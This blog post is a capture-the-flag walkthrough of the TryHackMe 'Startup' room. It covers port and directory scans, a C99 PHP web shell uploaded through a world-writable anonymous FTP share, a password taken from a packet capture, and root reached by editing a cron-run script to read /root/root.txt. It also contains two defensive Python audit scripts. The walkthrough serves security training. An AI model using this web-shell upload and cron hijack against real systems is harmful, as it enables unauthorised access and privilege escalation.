Having fun with TryHackMe again. So, here is the write-up and guideline to pass this challenge.

Room: https://tryhackme.com/room/startup
Level: Easy
Task: Abuse traditional vulnerabilities via untraditional means.

As usual, open the IP in the browser first.

No hint or whatsoever. Let's see which ports are open on this IP using Nmap.

# nmap -A -T4 10.10.249.X
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.8.163.74
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There are 3 ports open: 21, 22 and 80. Before drilling down into these ports, I need to brute-force the directory paths first using nikto and gobuster.

# nikto --host http://10.10.249.X/
....
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...

+ OSVDB-3233: /icons/README: Apache default file found.
....

There is 1 path named /files from the nikto scan.

# gobuster -w ~/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.249.X -t 70
....
/files (Status: 301)
/server-status (Status: 403)
....

The gobuster scan also finds the same /files path. With all this info, we can start on the task.

Go to http://10.10.X.X/files.

There is an empty ftp folder; I might check it later. There are also notice.txt and important.jpg. Let's open them.

Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.

Images usually have something hidden in them, but according to an online stego decoder this image doesn't contain any hidden message. That's okay, just proceed.

We haven't checked the FTP yet. I'm using WinSCP for an easier GUI 😁

After a while, I noticed that the ftp folder permission is 777. It's writable! I uploaded the C99 PHP shell into the ftp folder and renamed it index.php.

Let's open the shell page: http://10.10.249.X/files/ftp/ (the anonymous FTP directory is the same folder Apache serves under /files/ftp, so the uploaded index.php is executed by the web server).
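The weakness abused here is a world-writable FTP directory that Apache also serves, with PHP enabled, so an anonymous upload turns into code execution as www-data. As an added defensive example (not code from this write-up or from the room), here is a small Python audit that walks a web document root and reports every directory that is writable by everyone, noting any script files already sitting in it. The sample tree it builds is constructed for the demonstration and mirrors the room's /files/ftp layout; the script-extension list assumes a default Apache + mod_php setup.

```python
"""Report world-writable directories under a web document root.

Added defensive example, not code from the original write-up or the room.
It looks for the condition the room abuses: a directory that anyone can
write into (mode 777) that the web server also serves, so an uploaded
index.php is executed as www-data. The sample tree built by
build_demo_docroot is constructed for the demonstration and mirrors the
room's /files/ftp layout.
"""
import os
import stat
import tempfile

# Extensions the web server would pass to an interpreter rather than serve
# as static content (assumption: default Apache + mod_php, as on the target).
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}


def world_writable(path):
    """True when 'others' have the write bit on path (the 777 case)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_docroot(docroot):
    """Walk docroot and return a sorted list of findings.

    Each finding is (relative_dir, reason, scripts): reason is
    'writable+scripts' when script files are already present in a
    world-writable directory and 'writable' when the directory is merely
    open for anyone to drop one in.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        if not world_writable(dirpath):
            continue
        scripts = sorted(
            name for name in filenames
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS
        )
        rel = os.path.relpath(dirpath, docroot)
        findings.append((rel, "writable+scripts" if scripts else "writable", scripts))
    return sorted(findings)


def build_demo_docroot():
    """Construct a sample document root: files/ is 755, files/ftp is 777 and
    already holds an index.php, like the uploaded shell in the room."""
    root = tempfile.mkdtemp(prefix="docroot_")
    files = os.path.join(root, "files")
    ftp = os.path.join(files, "ftp")
    os.makedirs(ftp)
    with open(os.path.join(files, "notice.txt"), "w") as fh:
        fh.write("constructed sample file\n")
    with open(os.path.join(ftp, "index.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for an uploaded web shell */ ?>\n")
    os.chmod(files, 0o755)
    os.chmod(ftp, 0o777)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_docroot()
    for rel, reason, scripts in audit_docroot(target):
        print(f"{rel}: {reason} {' '.join(scripts)}".rstrip())
```

Pointed at a real document root (for example `python3 audit.py /var/www/html`) it prints the directories to fix. The usual fixes are to drop the write bit on the directory, keep the FTP upload root outside the web root (or set `anon_upload_enable=NO` in vsftpd.conf when uploads are not needed), and disable script execution in any directory that must stay writable, for instance with `php_admin_flag engine off` in that directory's Apache configuration block.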

Using the shell's command execution, look for the hint.

# ls -al /
...
drwxr-xr-x 2 www-data www-data 4096 Nov 12 04:53 incidents
-rw-r--r-- 1 www-data www-data 136 Nov 12 04:53 recipe.txt
...

Found a file named recipe.txt.

# cat /recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was XXXX.

Task 1 done.

Drill down into the incidents folder.

# ls -al /incidents
-rwxr-xr-x 1 www-data www-data 31224 Nov 12 04:53 suspicious.pcapng

Honestly, I didn't know what the pcapng extension is. I started googling it: it's a Wireshark capture format. Download it using the C99 shell and open it in Wireshark.

OK, that's a lot of packets. Let's check them one by one.

There is a shell request. Follow the HTTP stream.

Let's filter by IP address and port in Wireshark:

ip.addr == 192.168.22.139 && tcp.port == 4444

I followed TCP stream 7 (packet No. 35); there is a request where someone tries to access the lennie user account. Scrolling down, lennie's password is exposed in plaintext!

So let's SSH in as the lennie user.

# ssh lennie@10.10.X.X
lennie@10.10.249.157's password:
# ls -al
drwx------ 2 lennie lennie 4096 Mar 2 04:34 .cache
drwxr-xr-x 2 lennie lennie 4096 Nov 12 04:53 Documents
drwxr-xr-x 2 root root 4096 Nov 12 04:54 scripts
-rw-r--r-- 1 lennie lennie 38 Nov 12 04:53 user.txt

Found the 2nd flag!

# cat user.txt
THM{03ce3d619b80ccbXXXXXXXXXXXXXX}

2 down, 1 to go...

The hint says "scripts". Referring back to the listing of lennie's home directory, there is a scripts folder.

# ls -al scripts
-rwxr-xr-x 1 root root 77 Nov 12 04:53 planner.sh
-rw-r--r-- 1 root root 1 Mar 2 05:52 startup_list.txt

Both are owned by root. Let's see what's inside the shell script.

#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

Another shell script is triggered inside it. Let's follow the path.

# ls -al /etc
...
-rwx------ 1 lennie lennie 60 Mar 2 06:00 print.sh
...

This file is owned by lennie, which means that if we put a command inside it, it will run as root, because planner.sh is executed by root. Since a reverse shell was not working in my setup, I edited print.sh to write its output to a file instead:

ls -al /root > /exposed_root.txt

Save it and wait for some time, because planner.sh is triggered by cron. After a while, the directory listing of /root shows up in /exposed_root.txt:

drwx------  4 root root 4096 Nov 12 04:54 .
drwxr-xr-x 25 root root 4096 Mar 2 05:59 ..
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwxr-xr-x 2 root root 4096 Nov 12 04:54 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 38 Nov 12 04:53 root.txt
drwx------ 2 root root 4096 Nov 12 04:50 .ssh

So edit print.sh again to read root.txt:

cat /root/root.txt > /exposed_root.txt

Now root.txt is exposed:

THM{f963aaa6a430f21022215XXXXXXXXX}
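The root flag was reachable because a root cron job (planner.sh) executes /etc/print.sh, a file owned by lennie: whatever lennie writes there runs as root. As an added defensive example that is not part of this write-up or the room, here is a Python audit that reads a privileged script, extracts the absolute paths it invokes, and flags any that are not owned by the user running the job or are writable by group or others. The regex, the reason strings, the DEMO_FS records and the uid 1000 chosen for lennie are the added example's own assumptions; the page only shows the user name.

```python
"""Audit a privileged script for dependencies that a lower-privileged user
controls.

Added defensive example, not code from the original write-up or the room.
It models the root cause of the escalation above: root's cron runs
planner.sh, which calls /etc/print.sh, and print.sh is owned by lennie.
Every file a root job executes must be owned by root and not writable by
anyone else, or it is a hijack point. The regex, messages, DEMO_FS records
and uid 1000 for lennie are assumptions made for this example.
"""
import os
import re
import stat

# planner.sh exactly as shown in the write-up.
PLANNER_SH = """#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
"""

# An absolute path at the start of a command line, optionally run via
# source/bash/sh/'.'. Assumption: dependencies are referenced by absolute
# path, as planner.sh does; redirection targets like the echo line are skipped.
INVOKED_PATH = re.compile(r"(?m)^\s*(?:(?:source|bash|sh|\.)\s+)?(/[\w./-]+)")


def referenced_paths(script_text):
    """Return the absolute paths a script invokes, in order of appearance."""
    return [m.group(1) for m in INVOKED_PATH.finditer(script_text)]


def assess_dependency(path, runner_uid=0, st=None, stat_fn=os.stat):
    """Classify one file that a job running as runner_uid executes.

    Returns None when the file is safe to trust, otherwise a reason string.
    """
    if st is None:
        try:
            st = stat_fn(path)
        except (FileNotFoundError, KeyError):
            return "missing (whoever can create it decides what runs)"
    if st.st_uid != runner_uid:
        return f"owned by uid {st.st_uid}, not uid {runner_uid} that runs it"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "writable by group or others"
    return None


def audit_text(script_path, script_text, runner_uid=0, stat_fn=os.stat):
    """Check the script itself and everything it invokes; return
    {path: reason} for the risky ones."""
    findings = {}
    for dep in [script_path] + referenced_paths(script_text):
        reason = assess_dependency(dep, runner_uid, stat_fn=stat_fn)
        if reason:
            findings[dep] = reason
    return findings


def audit_script(script_path, runner_uid=0):
    """Real-filesystem entry point: audit a script on disk."""
    with open(script_path) as fh:
        return audit_text(script_path, fh.read(), runner_uid)


def stat_record(mode, uid):
    """Build an os.stat_result carrying only the fields the checks use."""
    return os.stat_result((stat.S_IFREG | mode, 0, 0, 1, uid, uid, 0, 0, 0, 0))


# Constructed records mirroring the room's listings: planner.sh is root 755,
# print.sh is lennie 700 (uid 1000 assumed).
DEMO_FS = {
    "/home/lennie/scripts/planner.sh": stat_record(0o755, 0),
    "/etc/print.sh": stat_record(0o700, 1000),
}


def demo_audit():
    """Run the audit against the constructed records instead of the disk."""
    return audit_text("/home/lennie/scripts/planner.sh", PLANNER_SH,
                      runner_uid=0, stat_fn=DEMO_FS.__getitem__)


if __name__ == "__main__":
    import sys
    result = audit_script(sys.argv[1]) if len(sys.argv) > 1 else demo_audit()
    for path, reason in result.items():
        print(f"{path}: {reason}")
```

With no argument it audits the constructed planner.sh records and reports /etc/print.sh; given the path of a script from root's crontab, /etc/cron.d or a systemd timer, it checks the real files. The fix on a box like this one is to make everything a root job runs root-owned and not group/world-writable (chown root:root, chmod 755), or to stop the job from calling files under a user's control at all.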

Mission completed!!!

#Tryhackme #cybersecurity

Software Engineer at Teratotech.com
